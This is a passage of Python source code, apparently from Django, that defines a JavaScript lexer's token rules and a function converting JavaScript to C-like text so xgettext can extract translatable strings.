148 |         Tok("punct",        literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
149 |         Tok("string",       r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
150 |         Tok("string",       r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
151 |         ]
152 | 
153 |     both_after = [
154 |         Tok("other",        r"."),
155 |         ]
156 | 
157 |     states = {
158 |         'div': # slash will mean division
159 |             both_before + [
160 |             Tok("punct", literals("/= /"), next='reg'),
161 |             ] + both_after,
162 | 
163 |         'reg':  # slash will mean regex
164 |             both_before + [
165 |             Tok("regex",
166 |                 r"""
167 |                     /                       # opening slash
168 |                     # First character is..
169 |                     (   [^*\\/[]            # anything but * \ / or [
170 |                     |   \\.                 # or an escape sequence
171 |                     |   \[                  # or a class, which has
172 |                             (   [^\]\\]     #   anything but \ or ]
173 |                             |   \\.         #   or an escape sequence
174 |                             )*              #   many times
175 |                         \]
176 |                     )
177 |                     # Following characters are same, except for excluding a star
178 |                     (   [^\\/[]             # anything but \ / or [
179 |                     |   \\.                 # or an escape sequence
180 |                     |   \[                  # or a class, which has
181 |                             (   [^\]\\]     #   anything but \ or ]
182 |                             |   \\.         #   or an escape sequence
183 |                             )*              #   many times
184 |                         \]
185 |                     )*                      # many times
186 |                     /                       # closing slash
187 |                     [a-zA-Z0-9]*            # trailing flags
188 |                 """, next='div'),
189 |             ] + both_after,
190 |         }
191 | 
192 |     def __init__(self):
193 |         super(JsLexer, self).__init__(self.states, 'reg')
194 | 
195 | 
def js_to_c_for_gettext(js):
    """Convert the Javascript source `js` into something resembling C for xgettext.

    The source is lexed with `JsLexer` and re-assembled token by token:

    - regex literals are replaced with the string "REGEX",
    - single-quoted strings are rewritten as double-quoted strings,
    - backslashes in identifiers (Unicode escapes) are replaced with "U",
    - every other token is copied through unchanged.

    """
    def escape_quotes(m):
        """Used in a regex to properly escape double quotes."""
        piece = m.group(0)
        return r'\"' if piece == '"' else piece

    def convert(kind, text):
        """Return the C-friendly spelling of one lexed token."""
        if kind == 'regex':
            # C doesn't grok regexes, and they aren't needed for gettext,
            # so just output a string instead.
            return '"REGEX"'
        if kind == 'string' and text.startswith("'"):
            # C doesn't have single-quoted strings, so make all strings
            # double-quoted.  Existing escape sequences are kept intact;
            # only bare double quotes gain a backslash.
            return '"' + re.sub(r"\\.|.", escape_quotes, text[1:-1]) + '"'
        if kind == 'id':
            # C can't deal with Unicode escapes in identifiers.  We don't
            # need them for gettext anyway, so replace them with something
            # innocuous
            return text.replace("\\", "U")
        return text

    return ''.join(convert(kind, text) for kind, text in JsLexer().lex(js))
231 | 


--------------------------------------------------------------------------------